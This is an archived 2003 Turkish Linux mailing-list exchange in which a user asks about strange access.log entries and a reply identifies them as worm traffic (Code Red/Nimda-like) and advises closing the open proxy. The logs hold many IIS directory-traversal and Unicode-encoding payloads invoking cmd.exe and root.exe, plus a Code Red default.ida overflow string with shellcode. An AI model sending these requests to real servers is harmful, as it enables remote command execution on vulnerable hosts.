[linux-ileri] Re: merhaba

---------

New Message Reply About this list Date view Thread view Subject view Author view Attachment view

From: Gürkan KARABATAK (gkarabatak@firat.edu.tr)
Date: Thu 12 Jun 2003 - 12:04:26 EEST

  • Next message: Gürkan KARABATAK: "[linux-ileri] Re: squid"

    Bu olay bizimde basimiza cok dert oldu. Bu worm makinalarin sizin proxy =
    uzerinden baska makinalara saldirmasi anlamina geliyor. Worm cod red =
    veya nimda turu birsey olabilir. Sanirim sizin proxy internete acik. =
    Gerekmiyorsa kapatmaniz yerinde olacak. Internet uzerinde bazi insanlar =
    haril haril anon. proxy aramasi yapiyor ve kullaniyor. O yuzden disari =
    acik bir proxy cok bas agritir. Proxy nizi sadece lan kullanabilecek =
    sekilde ayarlayin bunu iptables veya squid access listlere =
    yapabilirsiniz ama benim tercihim iptables olurdu. Bu worm trafigi =
    oldukca sisirir. Hatta squid de FD lerin dolmasindan dolayi bir sure =
    sonra kimse nete cikamaz olur. Buda olmassa log dosyaniz abarti sekilde =
    siser ve 3-5 saat icinde 2 gb sinirina dayanir. Tabi ayiklama durumu =
    olmadigi icin kendi loglarinizla beraber silmeniz gerekir. Lan icindeki =
    bir bilgisayar bunu yapiyorsa onuda engellemeniz gerekir. Anlayacaginiz =
    cok ciddi bir problem ve sonunda iptables a string modulu ekleyerek biz =
    bu sorunu cozduk. Ama ben kernel derleyemem diyorsaniz enazindan tespit =
    ettiginiz makinalari engellemeniz yeterli.

    -----Original Message-----
    From: kadir ulusoy [mailto:kadir@sonmezholding.com.tr]=20
    Sent: Thursday, June 12, 2003 11:20 AM
    To: linux-ileri@liste.linux.org.tr
    Subject: [linux-ileri] merhaba

    merhaba...
    ben=FDm b=FDr sorunum var asag=FDdak=FD dokumanlar ben=FDm access.log =
    lar=FDmdak=FD baz=FD sat=FDrlar. bunlara b=FDr anlam veremed=FDm =
    yard=FDmc=FD olan olursa sev=FDn=FDr=FDm
    linux lu mak=FDnada c=FDft ethernet var b=FDr=FD yerel taraf ( =
    192.168.0.0 ) d=FDger=FDde sab=FDt ip ( 213.243.14.37 )

    bu access.log =FDc=FDnde anl=FDyamad=FDg=FDm 213.243.188.98 nulu =FDp ve =
    bunun benzer=FD yan=FD 213.243....... basl=FDyan =FDp ler ne =
    yapm=FDslarda bu log dosyas=FDna yaz=FDlm=FDs..??

    yard=FDm=FDn=FDz =FDc=FDn s=FDmd=FDden tesekkureder=FDm ..

    .168.0.21 - - [09/Jun/2003:15:36:54 +0300] "CONNECT =
    loginnet.passport.com:443 HTTP/1.0" 405 299
    213.243.0.9 - - [09/Jun/2003:16:49:19 +0300] "GET =
    /scripts/root.exe?/c+dir HTTP/1.0" 404 278
    213.243.0.9 - - [09/Jun/2003:16:49:20 +0300] "GET /MSADC/root.exe?/c+dir =
    HTTP/1.0" 404 276
    213.243.0.9 - - [09/Jun/2003:16:49:23 +0300] "GET =
    /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 286
    213.243.0.9 - - [09/Jun/2003:16:49:29 +0300] "GET =
    /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 286
    213.243.0.9 - - [09/Jun/2003:16:49:33 +0300] "GET =
    /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300
    213.243.0.9 - - [09/Jun/2003:16:49:36 +0300] "GET =
    /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir =
    HTTP/1.0" 404 317
    213.243.0.9 - - [09/Jun/2003:16:54:38 +0300] "-" 408 -
    192.168.0.200 - - [09/Jun/2003:17:21:03 +0300] "GET /index.html =
    HTTP/1.0" 200 4440
    213.54.219.20 - - [09/Jun/2003:17:53:45 +0300] "GET =
    /scripts/root.exe?/c+dir HTTP/1.0" 404 278
    213.54.219.20 - - [09/Jun/2003:17:58:48 +0300] "-" 408 -
    213.243.188.98 - - [09/Jun/2003:21:24:02 +0300] "-" 408 -
    213.243.188.98 - - [09/Jun/2003:21:24:44 +0300] "GET =
    /scripts/root.exe?/c+dir HTTP/1.0" 404 278
    213.243.188.98 - - [09/Jun/2003:21:24:46 +0300] "GET =
    /MSADC/root.exe?/c+dir HTTP/1.0" 404 276
    213.243.188.98 - - [09/Jun/2003:21:24:47 +0300] "GET =
    /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 286
    213.243.188.98 - - [09/Jun/2003:21:24:48 +0300] "GET =
    /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 286
    213.243.188.98 - - [09/Jun/2003:21:24:59 +0300] "GET =
    /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300
    213.243.188.98 - - [09/Jun/2003:21:25:00 +0300] "GET =
    /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir =
    HTTP/1.0" 404 317
    213.243.188.98 - - [09/Jun/2003:21:25:04 +0300] "GET =
    /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir =
    HTTP/1.0" 404 317
    213.243.188.98 - - [09/Jun/2003:21:26:32 +0300] "GET =
    /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt=
    /system32/cmd.exe?/c+dir HTTP/1.0" 404 333
    213.243.188.98 - - [09/Jun/2003:21:26:39 +0300] "GET =
    /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299
    213.243.188.98 - - [09/Jun/2003:21:26:44 +0300] "GET =
    /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299
    213.243.188.98 - - [09/Jun/2003:21:26:45 +0300] "GET =
    /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299
    213.243.188.98 - - [09/Jun/2003:21:26:46 +0300] "GET =
    /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299
    213.243.188.98 - - [09/Jun/2003:21:26:47 +0300] "GET =
    /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 283
    213.243.188.98 - - [09/Jun/2003:21:26:49 +0300] "GET =
    /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 283
    213.243.188.98 - - [09/Jun/2003:21:26:53 +0300] "GET =
    /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300
    213.243.188.98 - - [09/Jun/2003:21:26:57 +0300] "GET =
    /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300
    213.243.0.9 - - [09/Jun/2003:21:55:43 +0300] "GET =
    /scripts/root.exe?/c+dir HTTP/1.0" 404 278
    213.243.0.9 - - [09/Jun/2003:21:55:43 +0300] "GET /MSADC/root.exe?/c+dir =
    HTTP/1.0" 404 276
    213.243.0.9 - - [09/Jun/2003:21:55:46 +0300] "GET =
    /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 286
    213.243.0.9 - - [09/Jun/2003:21:55:49 +0300] "GET =
    /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 286
    213.243.0.9 - - [09/Jun/2003:21:55:49 +0300] "GET =
    /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300
    213.243.0.9 - - [09/Jun/2003:21:55:49 +0300] "GET =
    /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir =
    HTTP/1.0" 404 317
    213.243.0.9 - - [09/Jun/2003:21:55:52 +0300] "GET =
    /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir =
    HTTP/1.0" 404 317
    213.243.0.9 - - [09/Jun/2003:21:55:55 +0300] "GET =
    /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt=
    /system32/cmd.exe?/c+dir HTTP/1.0" 404 333
    213.243.0.9 - - [09/Jun/2003:21:55:56 +0300] "GET =
    /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299
    213.243.0.9 - - [09/Jun/2003:21:56:02 +0300] "GET =
    /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299
    213.243.0.9 - - [09/Jun/2003:21:56:05 +0300] "GET =
    /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299
    213.243.0.9 - - [09/Jun/2003:21:56:05 +0300] "GET =
    /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299
    213.243.0.9 - - [09/Jun/2003:21:56:08 +0300] "GET =
    /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 283
    213.243.0.9 - - [09/Jun/2003:21:56:11 +0300] "GET =
    /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 283
    213.243.0.9 - - [09/Jun/2003:21:56:11 +0300] "GET =
    /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300
    213.243.0.9 - - [09/Jun/2003:21:56:14 +0300] "GET =
    /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300
    213.243.0.9 - - [09/Jun/2003:22:12:38 +0300] "GET =
    /scripts/root.exe?/c+dir HTTP/1.0" 404 278
    213.243.0.9 - - [09/Jun/2003:22:12:41 +0300] "GET /MSADC/root.exe?/c+dir =
    HTTP/1.0" 404 276
    213.243.0.9 - - [09/Jun/2003:22:12:41 +0300] "GET =
    /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 286
    213.243.0.9 - - [09/Jun/2003:22:12:41 +0300] "GET =
    /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 286
    213.243.0.9 - - [09/Jun/2003:22:12:41 +0300] "GET =
    /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300
    213.243.0.9 - - [09/Jun/2003:22:12:44 +0300] "GET =
    /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir =
    HTTP/1.0" 404 317
    213.243.0.9 - - [09/Jun/2003:22:12:47 +0300] "GET =
    /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir =
    HTTP/1.0" 404 317
    213.243.0.9 - - [09/Jun/2003:22:12:50 +0300] "GET =
    /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt=
    /system32/cmd.exe?/c+dir HTTP/1.0" 404 333
    213.243.0.9 - - [09/Jun/2003:22:12:50 +0300] "GET =
    /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299
    213.243.0.9 - - [09/Jun/2003:22:12:50 +0300] "GET =
    /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299
    213.243.0.9 - - [09/Jun/2003:22:12:54 +0300] "GET =
    /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299
    213.243.0.9 - - [09/Jun/2003:22:12:54 +0300] "GET =
    /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299
    213.243.0.9 - - [09/Jun/2003:22:12:54 +0300] "GET =
    /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 283
    213.243.0.9 - - [09/Jun/2003:22:12:57 +0300] "GET =
    /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 283
    213.243.0.9 - - [09/Jun/2003:22:13:40 +0300] "GET =
    /scripts/root.exe?/c+dir HTTP/1.0" 404 278
    213.243.0.9 - - [09/Jun/2003:22:13:40 +0300] "GET /MSADC/root.exe?/c+dir =
    HTTP/1.0" 404 276
    213.243.0.9 - - [09/Jun/2003:22:13:40 +0300] "GET =
    /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 286
    213.243.0.9 - - [09/Jun/2003:22:13:40 +0300] "GET =
    /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 286
    213.243.0.9 - - [09/Jun/2003:22:13:43 +0300] "GET =
    /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300
    213.243.0.9 - - [09/Jun/2003:22:13:43 +0300] "GET =
    /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir =
    HTTP/1.0" 404 317
    213.243.0.9 - - [09/Jun/2003:22:13:46 +0300] "GET =
    /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir =
    HTTP/1.0" 404 317
    213.243.0.9 - - [09/Jun/2003:22:13:46 +0300] "GET =
    /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt=
    /system32/cmd.exe?/c+dir HTTP/1.0" 404 333
    213.243.0.9 - - [09/Jun/2003:22:17:59 +0300] "-" 408 -
    213.243.0.9 - - [09/Jun/2003:22:18:48 +0300] "-" 408 -
    213.243.0.9 - - [09/Jun/2003:23:44:13 +0300] "GET =
    /scripts/root.exe?/c+dir HTTP/1.0" 404 278
    213.243.0.9 - - [09/Jun/2003:23:44:13 +0300] "GET /MSADC/root.exe?/c+dir =
    HTTP/1.0" 404 276
    213.243.0.9 - - [09/Jun/2003:23:44:13 +0300] "GET =
    /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 286
    213.243.0.9 - - [09/Jun/2003:23:44:13 +0300] "GET =
    /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 286
    213.243.0.9 - - [09/Jun/2003:23:44:16 +0300] "GET =
    /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300
    213.243.0.9 - - [09/Jun/2003:23:44:17 +0300] "GET =
    /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir =
    HTTP/1.0" 404 317
    213.243.0.9 - - [09/Jun/2003:23:44:17 +0300] "GET =
    /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir =
    HTTP/1.0" 404 317
    213.243.0.9 - - [09/Jun/2003:23:44:17 +0300] "GET =
    /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt=
    /system32/cmd.exe?/c+dir HTTP/1.0" 404 333
    213.243.0.9 - - [09/Jun/2003:23:44:17 +0300] "GET =
    /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299
    213.243.0.9 - - [09/Jun/2003:23:44:17 +0300] "GET =
    /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299
    213.243.0.9 - - [09/Jun/2003:23:44:20 +0300] "GET =
    /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299
    213.243.0.9 - - [09/Jun/2003:23:44:20 +0300] "GET =
    /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299
    213.243.0.9 - - [09/Jun/2003:23:44:20 +0300] "GET =
    /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 283
    213.243.0.9 - - [09/Jun/2003:23:44:23 +0300] "GET =
    /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 283
    213.243.0.9 - - [09/Jun/2003:23:44:26 +0300] "GET =
    /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300
    213.243.0.9 - - [09/Jun/2003:23:44:26 +0300] "GET =
    /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300
    213.243.0.9 - - [09/Jun/2003:23:55:34 +0300] "GET =
    /scripts/root.exe?/c+dir HTTP/1.0" 404 278
    213.243.0.9 - - [09/Jun/2003:23:55:38 +0300] "GET /MSADC/root.exe?/c+dir =
    HTTP/1.0" 404 276
    213.243.0.9 - - [09/Jun/2003:23:55:41 +0300] "GET =
    /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 286
    213.243.0.9 - - [09/Jun/2003:23:55:41 +0300] "GET =
    /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 286
    213.243.0.9 - - [09/Jun/2003:23:55:44 +0300] "GET =
    /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300
    213.243.0.9 - - [09/Jun/2003:23:55:47 +0300] "GET =
    /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir =
    HTTP/1.0" 404 317
    213.243.0.9 - - [09/Jun/2003:23:55:47 +0300] "GET =
    /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir =
    HTTP/1.0" 404 317
    213.243.0.9 - - [09/Jun/2003:23:55:47 +0300] "GET =
    /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt=
    /system32/cmd.exe?/c+dir HTTP/1.0" 404 333
    213.243.0.9 - - [09/Jun/2003:23:55:50 +0300] "GET =
    /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299
    213.243.0.9 - - [09/Jun/2003:23:55:53 +0300] "GET =
    /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299
    213.243.0.9 - - [09/Jun/2003:23:55:56 +0300] "GET =
    /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299
    213.243.0.9 - - [09/Jun/2003:23:55:59 +0300] "GET =
    /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299
    213.243.0.9 - - [09/Jun/2003:23:55:59 +0300] "GET =
    /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 283
    213.243.0.9 - - [09/Jun/2003:23:56:03 +0300] "GET =
    /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 283
    213.243.0.9 - - [09/Jun/2003:23:56:03 +0300] "GET =
    /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300
    213.243.0.9 - - [09/Jun/2003:23:56:03 +0300] "GET =
    /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300
    213.243.0.9 - - [10/Jun/2003:00:17:21 +0300] "GET =
    /scripts/root.exe?/c+dir HTTP/1.0" 404 278
    213.243.0.9 - - [10/Jun/2003:00:17:21 +0300] "GET /MSADC/root.exe?/c+dir =
    HTTP/1.0" 404 276
    213.243.0.9 - - [10/Jun/2003:00:17:21 +0300] "GET =
    /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 286
    213.243.0.9 - - [10/Jun/2003:00:22:23 +0300] "-" 408 -
    213.243.0.9 - - [10/Jun/2003:01:13:46 +0300] "GET =
    /scripts/root.exe?/c+dir HTTP/1.0" 404 278
    213.243.0.9 - - [10/Jun/2003:01:13:49 +0300] "GET /MSADC/root.exe?/c+dir =
    HTTP/1.0" 404 276
    213.243.0.9 - - [10/Jun/2003:01:13:52 +0300] "GET =
    /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 286
    213.243.0.9 - - [10/Jun/2003:01:13:55 +0300] "GET =
    /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 286
    213.243.0.9 - - [10/Jun/2003:01:13:55 +0300] "GET =
    /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300
    213.243.0.9 - - [10/Jun/2003:01:13:55 +0300] "GET =
    /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir =
    HTTP/1.0" 404 317
    213.243.0.9 - - [10/Jun/2003:01:18:57 +0300] "-" 408 -
    213.243.0.9 - - [10/Jun/2003:01:19:31 +0300] "GET =
    /scripts/root.exe?/c+dir HTTP/1.0" 404 278
    213.243.0.9 - - [10/Jun/2003:01:19:31 +0300] "GET /MSADC/root.exe?/c+dir =
    HTTP/1.0" 404 276
    213.243.0.9 - - [10/Jun/2003:01:19:31 +0300] "GET =
    /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 286
    213.243.0.9 - - [10/Jun/2003:01:19:31 +0300] "GET =
    /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 286
    213.243.0.9 - - [10/Jun/2003:01:19:31 +0300] "GET =
    /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300
    213.243.0.9 - - [10/Jun/2003:01:19:31 +0300] "GET =
    /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir =
    HTTP/1.0" 404 317
    213.243.0.9 - - [10/Jun/2003:01:19:31 +0300] "GET =
    /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir =
    HTTP/1.0" 404 317
    213.243.0.9 - - [10/Jun/2003:01:19:32 +0300] "GET =
    /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt=
    /system32/cmd.exe?/c+dir HTTP/1.0" 404 333
    213.243.0.9 - - [10/Jun/2003:01:19:32 +0300] "GET =
    /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299
    213.243.0.9 - - [10/Jun/2003:01:24:34 +0300] "-" 408 -
    217.215.106.254 - - [10/Jun/2003:03:33:59 +0300] "SEARCH / HTTP/1.1" 501 =
    334
    213.243.0.9 - - [10/Jun/2003:04:20:42 +0300] "GET =
    /scripts/root.exe?/c+dir HTTP/1.0" 404 278
    213.243.0.9 - - [10/Jun/2003:04:20:42 +0300] "GET /MSADC/root.exe?/c+dir =
    HTTP/1.0" 404 276
    213.243.0.9 - - [10/Jun/2003:04:20:43 +0300] "GET =
    /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 286
    213.243.0.9 - - [10/Jun/2003:04:20:43 +0300] "GET =
    /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 286
    213.243.0.9 - - [10/Jun/2003:04:20:43 +0300] "GET =
    /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300
    213.243.0.9 - - [10/Jun/2003:04:20:46 +0300] "GET =
    /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir =
    HTTP/1.0" 404 317
    213.243.0.9 - - [10/Jun/2003:04:20:46 +0300] "GET =
    /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir =
    HTTP/1.0" 404 317
    213.243.0.9 - - [10/Jun/2003:04:20:46 +0300] "GET =
    /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt=
    /system32/cmd.exe?/c+dir HTTP/1.0" 404 333
    213.243.0.9 - - [10/Jun/2003:04:20:47 +0300] "GET =
    /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299
    213.243.0.9 - - [10/Jun/2003:04:20:47 +0300] "GET =
    /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299
    213.243.0.9 - - [10/Jun/2003:04:20:47 +0300] "GET =
    /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299
    213.243.0.9 - - [10/Jun/2003:04:20:50 +0300] "GET =
    /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299
    213.243.0.9 - - [10/Jun/2003:04:20:50 +0300] "GET =
    /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 283
    213.243.0.9 - - [10/Jun/2003:04:20:50 +0300] "GET =
    /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 283
    213.243.0.9 - - [10/Jun/2003:04:20:53 +0300] "GET =
    /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300
    213.243.0.9 - - [10/Jun/2003:04:20:54 +0300] "GET =
    /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300
    213.189.170.71 - - [10/Jun/2003:05:22:20 +0300] "GET =
    /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX=
    XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX=
    XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX=
    XXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%=
    u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u=
    0000%u00=3Da HTTP/1.0" 404 273
    213.243.0.9 - - [10/Jun/2003:05:31:30 +0300] "GET =
    /scripts/root.exe?/c+dir HTTP/1.0" 404 278
    213.243.0.9 - - [10/Jun/2003:05:36:32 +0300] "-" 408 -
    213.243.0.9 - - [10/Jun/2003:07:30:32 +0300] "GET =
    /scripts/root.exe?/c+dir HTTP/1.0" 404 278
    213.243.0.9 - - [10/Jun/2003:07:30:32 +0300] "GET /MSADC/root.exe?/c+dir =
    HTTP/1.0" 404 276
    213.243.0.9 - - [10/Jun/2003:07:30:35 +0300] "GET =
    /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 286
    213.243.0.9 - - [10/Jun/2003:07:30:38 +0300] "GET =
    /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 286
    213.243.0.9 - - [10/Jun/2003:07:30:41 +0300] "GET =
    /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300
    213.243.0.9 - - [10/Jun/2003:07:30:44 +0300] "GET =
    /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir =
    HTTP/1.0" 404 317
    213.243.0.9 - - [10/Jun/2003:07:30:44 +0300] "GET =
    /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir =
    HTTP/1.0" 404 317
    213.243.0.9 - - [10/Jun/2003:07:30:44 +0300] "GET =
    /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt=
    /system32/cmd.exe?/c+dir HTTP/1.0" 404 333
    213.243.0.9 - - [10/Jun/2003:07:30:45 +0300] "GET =
    /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299
    213.243.0.9 - - [10/Jun/2003:07:30:45 +0300] "GET =
    /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299
    213.243.0.9 - - [10/Jun/2003:07:30:48 +0300] "GET =
    /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299
    213.243.0.9 - - [10/Jun/2003:07:30:48 +0300] "GET =
    /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299
    213.243.0.9 - - [10/Jun/2003:07:30:51 +0300] "GET =
    /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 283
    213.243.0.9 - - [10/Jun/2003:07:30:51 +0300] "GET =
    /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 283
    213.243.0.9 - - [10/Jun/2003:07:30:51 +0300] "GET =
    /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300
    213.243.0.9 - - [10/Jun/2003:07:30:51 +0300] "GET =
    /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300
    64.52.101.169 - - [10/Jun/2003:08:46:41 +0300] "HEAD / HTTP/1.1" 400 0

  • Next message: Gürkan KARABATAK: "[linux-ileri] Re: squid"
    New Message Reply About this list Date view Thread view Subject view Author view Attachment view

    ---------

    Bu arsiv hypermail 2.1.6 tarafindan uretilmistir.